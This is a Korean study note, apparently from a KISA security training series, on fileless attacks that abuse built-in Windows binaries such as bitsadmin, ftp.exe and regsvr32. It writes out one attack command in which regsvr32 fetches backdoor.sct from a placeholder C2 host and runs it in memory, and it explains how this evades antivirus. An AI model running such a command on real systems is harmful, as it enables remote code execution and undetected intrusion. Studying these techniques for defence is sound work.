작은 메모장
파일리스(Fileless) 공격 LoL 바이너리 본문
LoL은 파일리스 공격을 위해 시행하는 방법
LoL Bins는 이런 공격의 도구가 되는 빌트 인터프리터
오늘날의 공격 양상은 전부 이런식으로 진행됨
이를 이용한 몇 가지 예시...
Bitsadmin.exe
Background Intelligent Transfer Service (BITS),
원격 호스트로부터 대용량 파일을 전송받을 때 사용
윈도우 업데이트가 이 서비스를 활용
공격자는 이를 이용해 ADS에 은닉한 파일 실행, 지정한 파일 실행, 파일 다운로드 및 복사에 활용
ftp.exe
File Transport protocol(FTP)
윈도우에서 기본으로 제공하는 FTP 클라이언트 프로그램
공격자는 이를 지정된 프로그램을 실행하는 용도로 사용
regsvr32
DLL 파일을 서비스 등록에 사용하는 빌트인 명령어
공격자는 각종 옵션을 활용하여 악성코드를 서비스로 등록
regsvr32 /s /n /u /i:http://c2/backdoor.sct scrobj.dll
위 코드는 다음의 과정을 거침
1. 기본적으로, regsvr32는 공격자의 L2 서버에서 backdoor.sct 스크립트 파일을 가져옴
2. 가져온 스크립트 파일로 scrobj.dll을 실행
3. scrobj.dll은 내부의 VB스트립트 혹은 V스크립트 실행 함수로 전달받은 스크립트 파일을 메모리에 적재
이 과정에서, 디스크 터치, 파일 쓰기는 전혀 없었으며 악의적인 프로그램 또한 다운되지 않았음, 스크립트 또한 난독화
=> 안티바이러스 프로그램 감지 어려움
4. 메모리에 올라간 스크립트 파일이 또 다른 LoL Bins 혹은 Powershell같은 프로그램을 이용해 위 과정을 반복
'KISA 사이버 보안 훈련 > 스피어피싱 대응 기본' 카테고리의 다른 글
스피어 피싱 이메일 분석 실습 (0) | 2023.05.21 |
---|---|
스피어 피싱 이메일 분석 이론 (0) | 2023.05.21 |
파일리스(Fileless) 공격 개요 (0) | 2023.05.17 |
MITRE ATT&CK 프레임 워크 활용 (0) | 2023.05.17 |
MITRE ATT&CK 프레임 워크 (2) (0) | 2023.05.17 |